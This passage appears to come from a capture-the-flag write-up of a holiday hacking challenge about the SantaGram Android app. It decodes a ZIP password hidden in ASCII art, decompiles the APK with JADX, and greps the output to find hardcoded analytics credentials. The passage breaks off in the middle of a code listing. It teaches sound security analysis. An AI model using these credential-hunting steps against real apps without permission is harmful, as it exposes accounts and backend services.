GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF
PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO
SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ&amp;#64;.......:NORTHPOLEELFQWSANTASANTA
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......&amp;lt;HOHOHOSANTANORTHPOLEQQWQ
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO
CHRISTMASCHRISTMASL.........&amp;quot;HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO
GOODWILLTOWARDSMENm............&amp;quot;!???!&amp;quot;`...........NORTHPOLEHOHOHOWJOYQWELFQ
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ
SANTAPEACEONEARTHJOY/...........................&amp;lt;NORTHPOLECHRISTMASHOHOHOQQ
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ
CHRISTMASJOYSANTANORTHPOLEV?&amp;quot;-....................]GOODWILLTOWARDSMENQWJOYQ
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO
PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMEN[.........-&amp;quot;????????????????????4ELFCHRISTMASHOHOHOQQWELF
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF
SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ
JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO
CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ
JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO
SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF
HOHOHOGOODWILLTOWARDSMENSANTAWJOYQ&amp;#64;'.............sPEACEONEARTHELFWCHRISTMAS
GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ
SANTAGOODWILLTOWARDSMENQQWELFQQ&amp;#64;'.............sQWGOODWILLTOWARDSMENJOYJOYQQ
NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ
NORTHPOLECHRISTMASELFQQWELFQ&amp;#64;'.............aWCHRISTMASELFPEACEONEARTHQQWELF
SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY
CHRISTMASSANTACHRISTMASQQ&amp;#64;'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF
SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ
PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO
HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ
JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ
NORTHPOLEJOYHOHOHOF..............&amp;quot;????????????????4PEACEONEARTHQQWHOHOHOELF
HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ
HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH
JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF
GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY
NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF
ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ
HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ
PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY
JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY
ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ
HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ
CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ
HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF
NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ
JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY
JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO
NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ
HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ
HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ
SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO
SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY
ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ
PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ
ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY
CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ
JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ
JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF
SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF
HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA
PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ
CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ
NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO
JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH
NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF
HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ
NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ
ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO
SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH
ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ
JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY
PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ
SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ
ELFJOYCHRISTMASNORTHPOLEWPEACEONEARTHNORTHPOLEQ&amp;#64;^.]HOHOHOHOHOHOELFCHRISTMAS
HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY
CHRISTMASJOYPEACEONEARTHJOYSANTAQWCHRISTMASQ&amp;#64;&amp;quot;....]JOYGOODWILLTOWARDSMENJOY
GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF
ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW&amp;quot;.......]PEACEONEARTHELFQQWELFWQQ
GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ
CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW&amp;quot;..........]GOODWILLTOWARDSMENELFELF
JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO
PEACEONEARTHGOODWILLTOWARDSMENWJOYQW&amp;quot;.............]HOHOHOHOHOHONORTHPOLEJOY
ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ
NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF
JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO
GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY
NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ
GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ
NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY
ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ
NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ
GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ
PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ
HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH
JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ
NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ
NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS
PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ
ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ
PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF
CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ
NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ
GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY
ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY
NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY
CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ
ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY
CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ
PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ
PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH
NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ
JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
&lt;/pre&gt;
&lt;p&gt;Hope your neck is not stiff, 'cause you need to tilt your head to the right
to see the hidden message: &lt;code&gt;Bug Bounty&lt;/code&gt;. It so happens that the password
to the ZIP file is &lt;code&gt;bugbounty&lt;/code&gt;. We can now extract the APK file from the
ZIP archive:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; unzip SantaGram_v4.2.zip
&lt;span class="go"&gt;Archive:  SantaGram_v4.2.zip&lt;/span&gt;
&lt;span class="go"&gt;[SantaGram_v4.2.zip] SantaGram_4.2.apk password: bugbounty&lt;/span&gt;
&lt;span class="go"&gt;  inflating: SantaGram_4.2.apk&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="part-2-awesome-package-konveyance"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id2"&gt;Part 2: Awesome Package Konveyance&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Let's take a look at this APK, then! We can use &lt;a class="reference external" href="https://github.com/skylot/jadx"&gt;JADX&lt;/a&gt;
to decompile the APK.&lt;/p&gt;
&lt;p&gt;Since we're looking for credentials, we can then &lt;code&gt;grep&lt;/code&gt; on
&lt;code&gt;username&lt;/code&gt;, &lt;code&gt;password&lt;/code&gt;, etc., to find what we're looking for:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep --include &lt;span class="s2"&gt;&amp;quot;*.java&amp;quot;&lt;/span&gt; -Rn password .
&lt;span class="go"&gt;./android/support/v4/j/a/c.java:529:        stringBuilder.append(&amp;quot;; password: &amp;quot;).append(k());&lt;/span&gt;
&lt;span class="go"&gt;./com/northpolewonderland/santagram/Login.java:36:        this.c = (EditText) findViewById(R.id.passwordTxt);&lt;/span&gt;
&lt;span class="go"&gt;./com/northpolewonderland/santagram/Login.java:104:                                    aVar.b((CharSequence) &amp;quot;We&amp;#39;ve sent you an email to reset your password!&amp;quot;).a((int) R.string.app_name).a((CharSequence) &amp;quot;OK&amp;quot;, null);&lt;/span&gt;
&lt;span class="go"&gt;./com/northpolewonderland/santagram/SignUp.java:22:    EditText passwordTxt;&lt;/span&gt;
&lt;span class="go"&gt;./com/northpolewonderland/santagram/SignUp.java:29:        inputMethodManager.hideSoftInputFromWindow(this.passwordTxt.getWindowToken(), 0);&lt;/span&gt;
&lt;span class="go"&gt;./com/northpolewonderland/santagram/SignUp.java:46:        this.passwordTxt = (EditText) findViewById(R.id.passwordTxt2);&lt;/span&gt;
&lt;span class="go"&gt;./com/northpolewonderland/santagram/SignUp.java:56:                if (this.a.usernameTxt.getText().toString().matches(&amp;quot;&amp;quot;) || this.a.passwordTxt.getText().toString().matches(&amp;quot;&amp;quot;) || this.a.fullnameTxt.getText().toString().matches(&amp;quot;&amp;quot;)) {&lt;/span&gt;
&lt;span class="go"&gt;./com/northpolewonderland/santagram/SignUp.java:68:                parseUser.setPassword(this.a.passwordTxt.getText().toString());&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;./com/northpolewonderland/santagram/b.java:91:            jSONObject.put(&amp;quot;password&amp;quot;, &amp;quot;busyreindeer78&amp;quot;);&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;./com/northpolewonderland/santagram/SplashScreen.java:53:            jSONObject.put(&amp;quot;password&amp;quot;, &amp;quot;busyreindeer78&amp;quot;);&lt;/span&gt;
&lt;span class="go"&gt;./com/parse/ParseRESTUserCommand.java:39:        hashMap.put(&amp;quot;password&amp;quot;, str2);&lt;/span&gt;
&lt;span class="go"&gt;./com/parse/ParseUser.java:20:    private static final String KEY_PASSWORD = &amp;quot;password&amp;quot;;&lt;/span&gt;
&lt;span class="go"&gt;./com/parse/ParseUser.java:252:            throw new IllegalArgumentException(&amp;quot;Must specify a password for the user to log in with&amp;quot;);&lt;/span&gt;
&lt;span class="go"&gt;./com/parse/ParseUser.java:795:                final String password = currentUser.getPassword();&lt;/span&gt;
&lt;span class="go"&gt;./com/parse/ParseUser.java:810:                                if (password != null) {&lt;/span&gt;
&lt;span class="go"&gt;./com/parse/ParseUser.java:811:                                    currentUser.setPassword(password);&lt;/span&gt;
&lt;span class="go"&gt;./com/parse/ParseUser.java:998:            throw new ParseException(-1, &amp;quot;Unable to saveEventually on a ParseUser with dirty password&amp;quot;);&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We see that the file &lt;code&gt;./com/northpolewonderland/santagram/b.java&lt;/code&gt; is
interesting. If we open it, we'll find our wanted credentials:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File ./com/northpolewonderland/santagram/b.java, line 87&lt;/span&gt;
&lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="kd"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;a&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;final&lt;/span&gt; &lt;span class="n"&gt;Context&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="n"&gt;String&lt;/span&gt; &lt;span class="n"&gt;str&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;final&lt;/span&gt; &lt;span class="n"&gt;JSONObject&lt;/span&gt; &lt;span class="n"&gt;jSONObject&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;JSONObject&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;username&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;guest&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;password&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;busyreindeer78&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
&lt;/span&gt;        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;type&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;usage&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;activity&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="n"&gt;str&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;put&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Secure&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getString&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getContentResolver&lt;/span&gt;&lt;span class="o"&gt;(),&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;android_id&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;));&lt;/span&gt;
        &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;Thread&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="n"&gt;Runnable&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
            &lt;span class="kd"&gt;public&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="o"&gt;()&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;a&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getString&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;analytics_usage_url&lt;/span&gt;&lt;span class="o"&gt;),&lt;/span&gt; &lt;span class="n"&gt;jSONObject&lt;/span&gt;&lt;span class="o"&gt;);&lt;/span&gt;
            &lt;span class="o"&gt;}&lt;/span&gt;
        &lt;span class="o"&gt;}).&lt;/span&gt;&lt;span class="na"&gt;start&lt;/span&gt;&lt;span class="o"&gt;();&lt;/span&gt;
